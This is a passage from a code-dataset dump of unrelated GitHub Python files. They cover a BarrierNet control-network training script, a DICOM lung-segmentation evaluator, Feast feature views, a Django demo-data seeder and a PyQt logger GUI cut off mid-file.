len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n return losses\n\ndef test(dataloader, model, loss_fn, losses):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n pred = model(X)\n loss = loss_fn(pred, y)\n test_loss += loss.item()\n test_loss /= num_batches\n losses.append(test_loss)\n print(f\"Test avg loss: {test_loss:>8f} \\n\")\n return losses\n\n \nepochs = 20 \ntrain_losses, test_losses = [], []\nfor t in range(epochs):\n print(f\"Epoch {t+1}\\n-------------------------------\")\n train_losses = train(train_dataloader, model, loss_fn, optimizer, train_losses)\n test_losses = test(test_dataloader, model, loss_fn, test_losses)\nprint(\"Training Done!\")\n\n\n#save model\nif (barriernet == 1):\n torch.save(model.state_dict(), \"model_ocbf_bn.pth\")\nelse:\n torch.save(model.state_dict(), \"model_ocbf_fc.pth\")\nprint(\"Saved PyTorch Model State to xx.pth\")\n\n\n# on the test dataset\nmodel.eval()\npredic, actual, t = [], [], []\nt0 = 0\n\nwith torch.no_grad():\n for i in range(len(test0)):\n x, y = Variable(torch.from_numpy(test0[i]), requires_grad=False), test_labels[i]\n x = torch.reshape(x, (1,nFeatures))\n x = x.to(device)\n pred = model(x)\n predic.append(pred.item())\n actual.append(y)\n t.append(t0)\n t0 = t0 + 0.06\nprint(\"Test done!\") \n\npos, vel = init[2], init[3]\ntr, tr0 = [], 0\nimplem, safety, lb = [], [], []\ndt = 0.1\n\n# running on a vehicle\nwith torch.no_grad():\n for i in range(0,len(impl0),10):\n #normalize\n x = (pos - mean[2])/std[2]\n v = (vel - mean[3])/std[3]\n x_ip = impl0[i,0]*std[0] + mean[0] #recover\n #get safety metric\n safe = (x_ip - pos)/vel\n safety.append(safe)\n lb.append(1.8)\n #prepare for model input\n impl0[i,2] = x\n impl0[i,3] = v\n x_r = Variable(torch.from_numpy(impl0[i]), requires_grad=False)\n x_r = torch.reshape(x_r, (1,nFeatures))\n x_r = x_r.to(device)\n ctrl = model(x_r)\n \n #integrate dynamics\n pos = pos + vel*dt + 0.5*ctrl.item()*dt*dt\n vel = vel + ctrl.item()*dt\n \n implem.append(ctrl.item())\n tr.append(tr0)\n tr0 = tr0 + dt\nprint(\"Implementation done!\")\n \n\nplt.figure(1)\nplt.plot(t, predic, color = 'green', label = 'predicted')\nplt.plot(t, actual, color = 'red', label = 'actual(optimal)')\nplt.plot(tr, implem, color = 'blue', label = 'implemented')\nplt.legend()\nplt.ylabel('Control')\nplt.xlabel('time')\nplt.show()\n# plt.savefig('control_ocbf_bn.png')\n\nplt.figure(2) \nplt.plot(train_losses, color = 'green', label = 'train')\nplt.plot(test_losses, color = 'red', label = 'test')\nplt.legend()\nplt.ylabel('Loss')\nplt.xlabel('time')\nplt.ylim(ymin=0.)\nplt.show()\n# plt.savefig('Loss_ocbf_bn.png')\n\nplt.figure(3) \nplt.plot(tr, safety, color = 'green', label = 'safety')\nplt.plot(tr, lb, color = 'red', label = 'lower bound')\nplt.legend()\nplt.ylabel('Safety')\nplt.xlabel('time')\nplt.show()\n# plt.savefig('Safety_ocbf_bn.png')\n\nprint(\"end\")","repo_name":"Weixy21/BarrierNet","sub_path":"Merging/merging-barriernet.py","file_name":"merging-barriernet.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"16"}
+{"seq_id":"15062894600","text":"import pickle\nimport glob\nimport numpy as np\nimport sortedcontainers as sc\nfrom cloud_as_function import CloudAsFunction\nfrom multiprocessing import Process, Queue\n\n\ndef add_game(used_set, player, game):\n if used_set[player] is None:\n used_set[player] = []\n used_set[player].append(game)\n\n\ndef compare_to(valid_function, knn_set, k):\n sorted_list = sc.SortedList()\n for player, functions in knn_set.items():\n for unique_function in functions:\n try:\n score = valid_function.custom_distance_with(unique_function)\n if score < CloudAsFunction.theoric_max:\n sorted_list.add((score, player))\n except Exception as e:\n raise e\n \n player_count = {}\n for (score, player) in sorted_list[:k]:\n if player not in player_count.keys():\n player_count[player] = [0, 77777]\n player_count[player][0] += 1\n player_count[player][1] = min(score, player_count[player][1])\n \n max_score = 666666\n max_count = 0\n max_player = \"\"\n\n for player, element in player_count.items():\n count = element[0]\n score = element[1]\n if max_count < count:\n max_player = player\n max_count = count\n max_score = score\n elif max_count == count:\n if max_score > score:\n max_player = player\n max_score = score\n return max_player, max_score\n\n\ndef split(game_set, folds=10, weights=np.asarray([87, 0, 0, 0, 1000, 1000, 1])):\n i = 0\n for i in range(folds):\n functions_train_set = dict.fromkeys(games.keys())\n functions_validation_set = dict.fromkeys(games.keys())\n \n for player, games_of_him in game_set.items():\n games_length = len(games_of_him)\n for index, game in enumerate(games_of_him):\n if index >= int(games_length*i/folds) and index < int(games_length*(i+1)/folds):\n add_game(functions_validation_set, player, CloudAsFunction(game, weights))\n else:\n add_game(functions_train_set, player, CloudAsFunction(game, weights))\n \n for player, games_of_him in functions_train_set.items():\n try:\n functions_train_set[player] = [CloudAsFunction.aggregate(games_of_him)]\n except Exception:\n print('cannot aggregate player, doesn\\'t do anything then, pass')\n raise\n \n yield functions_train_set, functions_validation_set\n return\n\n\ndef split_valid(game_set, folds=4):\n for i in range(folds):\n functions_validation_set = dict.fromkeys(games.keys())\n \n for player, games_of_him in game_set.items():\n if games_of_him is None:\n continue\n games_length = len(games_of_him)\n for index, game in enumerate(games_of_him):\n if index >= int(games_length*i/folds) and index < int(games_length*(i+1)/folds):\n add_game(functions_validation_set, player, game)\n else:\n continue\n \n yield functions_validation_set\n return\n\n\ndef run(functions_train_set, functions_validation_set, q):\n correct = 0\n incorrect = 0\n for key, value in functions_validation_set.items():\n if value is None:\n continue\n for one_game in value:\n try:\n prediction, score = compare_to(one_game, functions_train_set, 1)\n if key == prediction:\n correct += 1\n else:\n incorrect += 1\n except IndexError:\n continue\n q.put((correct, incorrect))\n\n\ndef simulate(games_dict, weights=np.asarray([87, 0, 0, 0, 1000, 1000, 1])):\n correct = 0\n incorrect = 0\n\n q_list = []\n\n print(\": begin splitting\")\n sets = split(games_dict, 10, weights)\n \n print(\": begin testing\")\n for i, (functions_train_set, functions_validation_set) in enumerate(sets):\n print(\": compute score fold {}\".format(i))\n computing = []\n valid_sets = split_valid(functions_validation_set)\n \n for sub_valid_set in valid_sets:\n q_list.append(Queue())\n computing.append(Process(target=run, args=(functions_train_set, sub_valid_set, q_list[-1])))\n computing[-1].start()\n for t, q in zip(computing, q_list):\n c, inc = q.get()\n correct += c\n incorrect += inc\n t.join()\n break\n return correct / (correct + incorrect)\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n\n games = {}\n\n print(\": loading games\")\n\n for filename in glob.iglob('.\\small functions bt\\*.dat'):\n with open(filename, 'rb') as f:\n games[filename[18:-4]] = pickle.load(f)\n\n bef_value = -1\n conseq_desc = 0\n for i in range(5, 51, 5):\n CloudAsFunction.window = i\n value = simulate(games, weights=np.asarray([1, 121, 121, 121, 101, 101, 1]))\n if value < bef_value:\n conseq_desc += 1\n else:\n conseq_desc = 0\n if conseq_desc >= 5:\n break\n bef_value = value\n print(\"for window = {}, success is : {}\".format(i, value))\n print(\"for step = {}, success is : {}\".format(i, value))\n\n\n","repo_name":"gegeAi/fdcompo","sub_path":"optimize_interval.py","file_name":"optimize_interval.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"33720995340","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport pydicom as dicom \nimport os\nfrom skimage.segmentation import clear_border\n\npath = \".\\scans\"\nsegmentation = []\nimagens = []\nseg_aux_paths = []\npaths_seg = []\npaths_img = []\n\ndef display(display_list):\n plt.figure(figsize=(15, 15))\n\n title = ['Input Image', 'True Mask', 'Predicted Mask']\n\n for i in range(len(display_list)):\n plt.subplot(1, len(display_list), i+1)\n plt.title(title[i])\n plt.imshow(display_list[i])\n plt.axis('off')\n plt.show()\n\ndef sort_list(list_str):\n x=[]\n dig=\"0123456789\"\n for i in list_str:\n p=\"\"\n for j in i:\n if j in dig:\n p+=j\n x.append(int(p))\n y=[]\n y.extend(x)\n x.sort()\n res=[]\n for i in x:\n res.append(list_str[y.index(i)])\n return res\n\ndef get_images_dir(path):\n for root, dirs, files in os.walk(path):\n files.sort()\n for file in files:\n relativePath = os.path.join(root, file)\n if('lung_mask' in relativePath):\n seg_aux_paths.append(relativePath)\n else:\n paths_img.append(relativePath)\n\n if('lung_mask' in root):\n aux_name = sort_list(seg_aux_paths)\n seg_aux_paths.clear()\n for filepath in aux_name:\n paths_seg.append(filepath)\n\ndef get_images(path):\n get_images_dir(path)\n print(len(paths_seg), len(paths_img))\n for i in range(len(paths_seg)):\n path_image, path_mask = paths_seg[i], paths_img[i]\n segmentation.append(dicom.dcmread(path_image).pixel_array)\n imagens.append(dicom.dcmread(path_mask).pixel_array)\n\nget_images(path)\n\npred = []\n\ndef normalize_canais(input_image):\n input_image = np.stack((input_image,)*1, axis=-1)\n return input_image\n\nkernel = np.ones((14, 14), 'uint8')\nkernel2 = np.ones((12, 12), 'uint8')\nfor i in range(len(segmentation)):\n \n img = normalize_canais(imagens[i])\n\n filtro = cv2.medianBlur(img, 5)\n erode_img = cv2.erode(filtro, kernel2, iterations=1)\n dilate_img = cv2.dilate(erode_img, kernel, iterations=1)\n # Aplica uma limiarização para binarizar a imagem\n ret, thresh = cv2.threshold(dilate_img, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n mask = np.vectorize(clear_border, signature='(n,m)->(n,m)')(thresh)\n\n pred.append(mask)\n #para ver de maneira visual a segmentacao\n #display([imagens[i], segmentation[i], mask])\n\ndef get_metrics_pixel_to_pixel(true, predict):\n fn = 0\n tp = 0\n tn = 0\n fp = 0\n for index in range(len(predict)):\n for indexInside in range(len(predict[index])):\n for indexDeep in range(len(predict[index][indexInside])):\n if true[index][indexInside][indexDeep] == 255 and predict[index][indexInside][indexDeep] == 255:\n tp += 1\n if true[index][indexInside][indexDeep] == 0 and predict[index][indexInside][indexDeep] == 0:\n tn += 1\n if true[index][indexInside][indexDeep] == 255 and predict[index][indexInside][indexDeep] == 0:\n fn += 1\n if true[index][indexInside][indexDeep] == 0 and predict[index][indexInside][indexDeep] == 255:\n fp += 1\n \n return fn, tp, tn, fp\n\nfn, tp, tn, fp = get_metrics_pixel_to_pixel(segmentation, pred)\nprecision = tp / (tp + fp)\nrecall = tp / (tp + fn)\nF1_score = 2 * (precision * recall) / (precision + recall)\ndice_Coefficient = 2 * tp / (2*tp + fp + fn)\nacuracia = (tp + tn) / (tp + fp + fn + tn)\nprint(\"False Negative: \" + str(fn) + \" True Negative: \" + str(fp))\nprint(\"False Positive: \" + str(tp) + \" True Positive: \" + str(tn))\nprint(\"Precision: \" + str(precision))\nprint(\"recall: \" + str(recall))\nprint(\"F1_score: \" + str(F1_score))\nprint(\"Dice Coefficient: \" + str(dice_Coefficient))\nprint(\"acuracia: \" + str(acuracia))\n\n\n","repo_name":"josepedroso/segmented_dicom_images","sub_path":"segmenta.py","file_name":"segmenta.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2584126987","text":"#!/usr/bin/env python3\nimport fbmatrix\nimport argparse\nimport time\nimport assembly.yuv420\nfrom ffpyplayer.player import MediaPlayer\nimport numpy as np\nfrom pyrr import Matrix44\n\ndef render():\n global bytearray, player\n global args\n \n videoAspect = screenAspect = args.columns/args.rows\n \n frame, val = player.get_frame()\n\n if frame:\n img, t = frame\n\n data = img.to_bytearray()\n size = img.get_size()\n \n videoAspect = size[0]/size[1]\n \n bytearray.setYUV420(data, size[0], size[1])\n\n time.sleep(val)\n\n M = np.eye(4, dtype=np.float32)\n\n if not args.stretch:\n if args.fit:\n if screenAspect > videoAspect:\n # Pillar box\n M = M * Matrix44.from_scale( (1, screenAspect/videoAspect, 1, 1))\n else:\n # Letter box\n M = M * Matrix44.from_scale( (videoAspect/screenAspect, 1, 1))\n else:\n if screenAspect > videoAspect:\n # Pillar box\n M = M * Matrix44.from_scale( (videoAspect/screenAspect, 1, 1))\n else:\n # Letter box\n M = M * Matrix44.from_scale( (1, screenAspect/videoAspect, 1))\n\n bytearray.setProjection(M)\n bytearray.render()\n\nimport common\n\nparser = argparse.ArgumentParser(description='Framebuffer RGB matrix player')\ncommon.add_args(parser)\nparser.add_argument('--fit', action='store_true', help='Fit the video as large as it can but maintaining aspect ratio. This means some part will be cut off')\nparser.add_argument('--stretch', action='store_true', help='Stretch the video to fit the screen exactly, which means aspect ratio will not be preserved. I really hate it when people do this.')\nparser.add_argument('videofile', help='Video to play')\n\nargs = parser.parse_args()\n\nplayer = MediaPlayer(args.videofile, ff_opts={'out_fmt':'yuv420p'})\n\nmatrix = common.renderer_from_args(args)\n\nbytearray = assembly.yuv420.bytearray(supersample = args.supersample)\n\nmatrix.run(render)\n","repo_name":"sharky5102/fbmatrix","sub_path":"fbmplay.py","file_name":"fbmplay.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"21007684308","text":"from datetime import timedelta\n\nimport pandas as pd\nfrom feast import (\n FeatureView,\n Field,\n)\nfrom feast.on_demand_feature_view import on_demand_feature_view\nfrom feast.types import Float32, Float64, String\n\nfrom data_sources import *\nfrom entities import *\n\ndriver_hourly_stats_view = FeatureView(\n name=\"driver_hourly_stats\",\n description=\"Hourly features\",\n entities=[\"driver\"],\n ttl=timedelta(seconds=8640000000),\n schema=[\n Field(name=\"conv_rate\", dtype=Float32),\n Field(name=\"acc_rate\", dtype=Float32),\n ],\n online=True,\n source=driver_stats,\n tags={\"production\": \"True\"},\n owner=\"test2@gmail.com\",\n)\n\ndriver_daily_features_view = FeatureView(\n name=\"driver_daily_features\",\n entities=[\"driver\"],\n ttl=timedelta(seconds=8640000000),\n schema=[\n Field(name=\"daily_miles_driven\", dtype=Float32),\n Field(name=\"lat\", dtype=Float32),\n Field(name=\"lon\", dtype=Float32),\n ],\n online=True,\n source=driver_stats_push_source,\n tags={\"production\": \"True\"},\n owner=\"test2@gmail.com\",\n)\n\n\n# Define an on demand feature view which can generate new features based on\n# existing feature views and RequestSource features\n@on_demand_feature_view(\n sources=[driver_hourly_stats_view, val_to_add_request],\n schema=[\n Field(name=\"conv_rate_plus_val1\", dtype=Float64),\n Field(name=\"conv_rate_plus_val2\", dtype=Float64),\n ],\n)\ndef transformed_conv_rate(inputs: pd.DataFrame) -> pd.DataFrame:\n df = pd.DataFrame()\n df[\"conv_rate_plus_val1\"] = inputs[\"conv_rate\"] + inputs[\"val_to_add\"]\n df[\"conv_rate_plus_val2\"] = inputs[\"conv_rate\"] + inputs[\"val_to_add_2\"]\n return df\n\n\n@on_demand_feature_view(\n sources=[driver_daily_features_view],\n schema=[Field(name=\"avg_hourly_miles_driven\", dtype=Float64),],\n)\ndef avg_hourly_miles_driven(inputs: pd.DataFrame) -> pd.DataFrame:\n df = pd.DataFrame()\n df[\"avg_hourly_miles_driven\"] = inputs[\"daily_miles_driven\"] / 24\n return df\n\n\n@on_demand_feature_view(\n sources=[driver_daily_features_view],\n schema=[Field(name=f\"geohash_{i}\", dtype=String) for i in range(1, 7)],\n)\ndef location_features_from_push(inputs: pd.DataFrame) -> pd.DataFrame:\n import pygeohash as gh\n\n df = pd.DataFrame()\n df[\"geohash\"] = inputs.apply(lambda x: gh.encode(x.lat, x.lon), axis=1).astype(\n \"string\"\n )\n\n for i in range(1, 7):\n df[f\"geohash_{i}\"] = df[\"geohash\"].str[:i].astype(\"string\")\n return df\n","repo_name":"feast-dev/feast-workshop","sub_path":"module_2/feature_repo/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"16"}
+{"seq_id":"24404239521","text":"import torch.nn as nn\nimport torch\nfrom timm.models.layers import trunc_normal_\nfrom torch.nn import functional as F\nin_place = True\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n trunc_normal_(m.weight, std=0.02)\n if isinstance(m, nn.Linear) and m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.LayerNorm):\n nn.init.constant_(m.bias, 0)\n nn.init.constant_(m.weight, 1.0)\ndef unpadding(y, target_size):\n H, W = target_size\n H_pad, W_pad = y.size(2), y.size(3)\n extra_h = H_pad - H\n extra_w = W_pad - W\n if extra_h > 0:\n y = y[:, :, :-extra_h]\n if extra_w > 0:\n y = y[:, :, :, :-extra_w]\n return y\nclass Conv3d(nn.Conv3d):\n\n def __init__(self, in_channels, out_channels, kernel_size, stride=(1,1,1), padding=(0,0,0), dilation=(1,1,1), groups=1, bias=False):\n super(Conv3d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias)\n\n def forward(self, x):\n weight = self.weight\n weight_mean = weight.mean(dim=1, keepdim=True).mean(dim=2, keepdim=True).mean(dim=3, keepdim=True).mean(dim=4, keepdim=True)\n weight = weight - weight_mean\n std = torch.sqrt(torch.var(weight.view(weight.size(0), -1), dim=1) + 1e-12).view(-1, 1, 1, 1, 1)\n weight = weight / std.expand_as(weight)\n return F.conv3d(x, weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\n\ndef conv3x3x3(in_planes, out_planes, kernel_size=(3,3,3), stride=(1,1,1), padding=1, dilation=1, bias=False, weight_std=False):\n \"3x3x3 convolution with padding\"\n if weight_std:\n return Conv3d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias)\n else:\n return nn.Conv3d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias)\nclass NoBottleneck(nn.Module):\n def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, fist_dilation=1, multi_grid=1, weight_std=False):\n super(NoBottleneck, self).__init__()\n self.weight_std = weight_std\n self.gn1 = nn.GroupNorm(16, inplanes)\n self.conv1 = conv3x3x3(inplanes, planes, kernel_size=(3, 3, 3), stride=stride, padding=(1,1,1),\n dilation=dilation * multi_grid, bias=False, weight_std=self.weight_std)\n self.relu = nn.LeakyReLU(0.1,inplace=in_place)\n\n self.gn2 = nn.GroupNorm(16, planes)\n self.conv2 = conv3x3x3(planes, planes, kernel_size=(3, 3, 3), stride=1, padding=(1,1,1),\n dilation=dilation * multi_grid, bias=False, weight_std=self.weight_std)\n self.downsample = downsample\n self.dilation = dilation\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.gn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n\n\n out = self.gn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out = out + residual\n\n return out","repo_name":"SooLab/CCQ","sub_path":"code/network/utils_.py","file_name":"utils_.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"11442396512","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User, Permission\nfrom django.contrib.auth.models import Group\nfrom activities.models import Local, Activity, Dish\nfrom users.models import Guest, Chef, Monitor, Manager, Plan\nfrom django.contrib.contenttypes.models import ContentType\n\n\nclass Command(BaseCommand):\n args = ''\n help = 'our help string comes here'\n\n def _migrate(self):\n # Drop all tables\n print('Dropping tables...')\n\n User.objects.all().delete()\n Activity.objects.all().delete()\n Local.objects.all().delete()\n Dish.objects.all().delete()\n\n print('Dropping tables...OK')\n print('Populating database...')\n\n # ==================================================================================================\n # ==================================================================================================\n\n Group.objects.get_or_create(name='Guest')\n Group.objects.get_or_create(name='Monitor')\n Group.objects.get_or_create(name='Chef')\n Group.objects.get_or_create(name='Manager')\n print('Groups created...Ok')\n\n plan = ContentType.objects.get_for_model(Plan)\n Permission.objects.get_or_create(codename='free',\n name='Free',\n content_type=plan)\n Permission.objects.get_or_create(codename='lite',\n name='Lite',\n content_type=plan)\n Permission.objects.get_or_create(codename='premium',\n name='Premium',\n content_type=plan)\n print('Permissions created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n admin_admin = User(\n username='admin',\n email='admin@admin.com')\n admin_admin.set_password('admin')\n admin_admin.is_staff = True\n admin_admin.is_superuser = True\n admin_admin.save()\n\n print('Admins created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n guest1 = Guest(\n username='guest1',\n email='guest1@guest1.com',\n first_name='guest1',\n avatar='/images/user1.ico',\n )\n guest1.set_password('guest1')\n guest1.save()\n guest1.groups.add(Group.objects.get(name='Guest'))\n\n guest2 = Guest(\n username='guest2',\n email='guest2@guest2.com',\n first_name='guest2',\n )\n guest2.set_password('guest2')\n guest2.save()\n guest2.groups.add(Group.objects.get(name='Guest'))\n print('Guests created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n chef1 = Chef(\n username='chef1',\n email='chef1@chef1.com',\n first_name='chef1',\n )\n chef1.set_password('chef1')\n chef1.save()\n chef1.groups.add(Group.objects.get(name='Chef'))\n chef1.user_permissions.add(Permission.objects.get(name='Free'))\n\n chef2 = Chef(\n username='chef2',\n email='chef2@chef2.com',\n first_name='chef2',\n )\n chef2.set_password('chef2')\n chef2.save()\n chef2.groups.add(Group.objects.get(name='Chef'))\n chef2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Chefs created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n monitor1 = Monitor(\n username='monitor1',\n email='monitor1@monitor1.com',\n first_name='monitor1',\n )\n monitor1.set_password('monitor1')\n monitor1.save()\n monitor1.groups.add(Group.objects.get(name='Monitor'))\n monitor1.user_permissions.add(Permission.objects.get(name='Free'))\n\n monitor2 = Monitor(\n username='monitor2',\n email='monitor2@monitor2.com',\n first_name='monitor2',\n )\n monitor2.set_password('monitor2')\n monitor2.save()\n monitor2.groups.add(Group.objects.get(name='Monitor'))\n monitor2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Monitors created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n manager1 = Manager(\n username='manager1',\n email='manager1@manager1.com',\n first_name='manager1',\n )\n manager1.set_password('manager1')\n manager1.save()\n manager1.groups.add(Group.objects.get(name='Manager'))\n manager1.user_permissions.add(Permission.objects.get(name='Free'))\n\n manager2 = Manager(\n username='manager2',\n email='manager1@manager2.com',\n first_name='manager2',\n )\n manager2.set_password('manager2')\n manager2.save()\n manager2.groups.add(Group.objects.get(name='Manager'))\n manager2.user_permissions.add(Permission.objects.get(name='Free'))\n\n print('Managers created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n activity1 = Activity(\n name='activity1',\n description='activity1Description',\n place='activity1Place',\n latitude=10.0,\n longitude=10.0,\n start_date='2017-3-5',\n price_per_person=6,\n end_date='2017-7-29',\n owner=monitor1\n )\n activity1.save()\n activity1.assistants.add(guest1)\n activity1.assistants.add(guest2)\n\n activity2 = Activity(\n name='activity2',\n description='activity2Description',\n place='activity2Place',\n latitude=10.0,\n longitude=10.0,\n start_date='2010-3-15',\n end_date='2017-7-29',\n price_per_person=6,\n owner=monitor2,\n )\n activity2.save()\n activity2.assistants.add(guest1)\n\n print('Activities... ok')\n # ==================================================================================================\n # ==================================================================================================\n\n local1 = Local(\n name='local1',\n description='description',\n address='address1',\n latitude=10.00,\n longitude=12.00,\n manager=manager1)\n local1.save()\n\n local2 = Local(\n name='local2',\n description='description',\n address='address2',\n latitude=10.00,\n longitude=12.00,\n manager=manager2)\n local2.save()\n\n print('Locals... Ok')\n\n # ==================================================================================================\n # Dish\n # ==================================================================================================\n\n dish1 = Dish(name='dish1', description='dish1Description', date='2017-02-5', hour='12:00', owner=chef1,\n max_assistants=3, contribution=5.6,\n photo='http://valenciaoberta.es/wp-content/uploads/2016/08/paella-2.jpg')\n dish1.save()\n dish1.assistants.add(guest1)\n dish1.assistants.add(guest2)\n dish2 = Dish(name='dish2', description='dish2Description', date='2017-03-15', hour='13:00', owner=chef1,\n max_assistants=3, contribution=4.0)\n dish2.save()\n dish3 = Dish(name='dish3', description='dish3Description', date='2017-03-25', hour='14:00', owner=chef2,\n max_assistants=1, contribution=2.0)\n dish3.save()\n dish4 = Dish(name='dish4', description='dish4Description', date='2017-08-29', hour='14:00', owner=chef2,\n max_assistants=5, contribution=5.0)\n dish4.save()\n dish5 = Dish(name='dish5', description='dish5Description', date='2017-8-25', hour='15:00', owner=chef2,\n max_assistants=10, contribution=3.6)\n dish5.save()\n\n print('Dishes... Ok')\n\n print('Populating database...OK\\n'\n 'Ready to use!')\n\n def handle(self, *args, **options):\n self._migrate()\n","repo_name":"andreslopezalbin/NetMeals","sub_path":"netmeals/management/commands/populatedb.py","file_name":"populatedb.py","file_ext":"py","file_size_in_byte":9325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"39411687751","text":"from BaseSolution import *\nfrom ListNode import *\nclass LinkedListCycle(BaseSolution):\n def __init__(self):\n BaseSolution.__init__(self)\n\n def solution(self, head):\n if not head: return False\n newHead = ListNode(-1)\n newHead.next = head\n slow = newHead\n fast = newHead.next\n while slow and fast and fast.next:\n if slow == fast: return True\n slow = slow.next\n fast = fast.next.next\n return False\n\n","repo_name":"caunion/leetcode","sub_path":"solutions/LinkedListCycle.py","file_name":"LinkedListCycle.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"11308948400","text":"print('2자리의 양수를 입력하세요.')\n\nwhile True:\n no = int(input('값을 입력하세요.: '))\n if not(no < 10 or no > 99):\n break\n\nprint(f'입력받은 양수는 {no}입니다.')\n\n#De Morgan's law. If not 2 digit number, makes the user input again.","repo_name":"dennis1219/algorithm_study","sub_path":"python/01_basics/2digits1_de_morgan.py","file_name":"2digits1_de_morgan.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"13849217521","text":"import sys,os\nfrom PyQt5.QtWidgets import QLineEdit, QGridLayout,QLabel ,QPushButton,QCheckBox \nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom PyQt5.QtCore import QTimer\nfrom logging.handlers import RotatingFileHandler\n\n\n\nimport logging\nfrom run import achia_logger\nimport yaml\n\n\n\n\nlogger = logging.getLogger()\nlogging.basicConfig(level=logging.INFO)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nlogger.addHandler(ch)\n# # create formatter\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n# # add formatter to ch\nch.setFormatter(formatter)\n\nfile_handler = RotatingFileHandler('achia-debug.log', maxBytes=2000, backupCount=10)\nfile_handler.setLevel(logging.DEBUG)\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\n\n# # if logger.handlers:\n# # print(logger.handlers)\n# # for hnd in logger.handlers:\n# # logger.removeHandler(hnd)\n\n# # add ch to logger\n\n\n\n\nlogger_gui = logging.getLogger()\nlogger_gui.setLevel(logging.DEBUG)\n# if logger_gui.handlers:\n# print(logger_gui.handlers)\n# for hnd in logger_gui.handlers:\n# logger_gui.removeHandler(hnd)\n# # You can control the logging level\n# logger_gui.setLevel(logging.DEBUG)\n\n\nclass QTextEditLogger(logging.Handler):\n def __init__(self, parent):\n super().__init__()\n self.widget = QtWidgets.QPlainTextEdit(parent)\n self.widget.setReadOnly(True)\n\n def emit(self, record):\n msg = self.format(record)\n self.widget.appendPlainText(msg)\n\n\nclass MyDialog(QtWidgets.QDialog, QtWidgets.QPlainTextEdit):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.current_directory = os.path.dirname(__file__)\n self.note_icon = os.path.join( self.current_directory,'img','logo.ico' )\n self.file_name = 'achia.yaml'\n\n try:\n f = open(self.file_name, 'r')\n self.config = yaml.load(stream=f, Loader=yaml.Loader)\n f.close() \n if not isinstance(self.config, dict):\n self.config = dict()\n except:\n self.config = dict()\n print(self.config)\n self.chia_logger = achia_logger() \n \n\n \n\n logTextBox = QTextEditLogger(self)\n logTextBox.setLevel(logging.INFO)\n\n # You can format what is printed to text box\n logTextBox.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))\n logger_gui.addHandler(logTextBox)\n\n grid = QGridLayout()\n grid.setSpacing(2)\n \n e1_lable = QLabel('Token')\n e2_lable = QLabel('Machine ID')\n e3_lable = QLabel('Plotting Logs Path')\n\n self.e1 = QLineEdit(self.config.get(\"TOKEN\",\"Token xxxxxxxxxxxxxxxxxx\"))\n self.e2 = QLineEdit(self.config.get(\"MACHINE_ID\",\"xxxxxx\"))\n self.e3 = QLineEdit(self.config.get(\"PLOTTING_LOGS_PATH\",\"\"))\n self.e3.setPlaceholderText(\"Put in the folder of the plotting logs\")\n label = QLabel()\n label.setText('https://achia.co')\n label.setOpenExternalLinks(True)\n \n grid.addWidget(e1_lable, 1, 0, 1,1)\n grid.addWidget(self.e1, 1, 1, 1,4)\n\n grid.addWidget(e2_lable, 2, 0,1,1)\n grid.addWidget(self.e2, 2, 1,1,4)\n\n grid.addWidget(e3_lable, 3, 0,1,1)\n grid.addWidget(self.e3, 3, 1,1,4)\n \n \n logo = QLabel()\n logo.setPixmap(QtGui.QPixmap(os.path.join( self.current_directory,'img','logo-text.png' )).scaledToWidth(160))\n version = QLabel(\"Version: 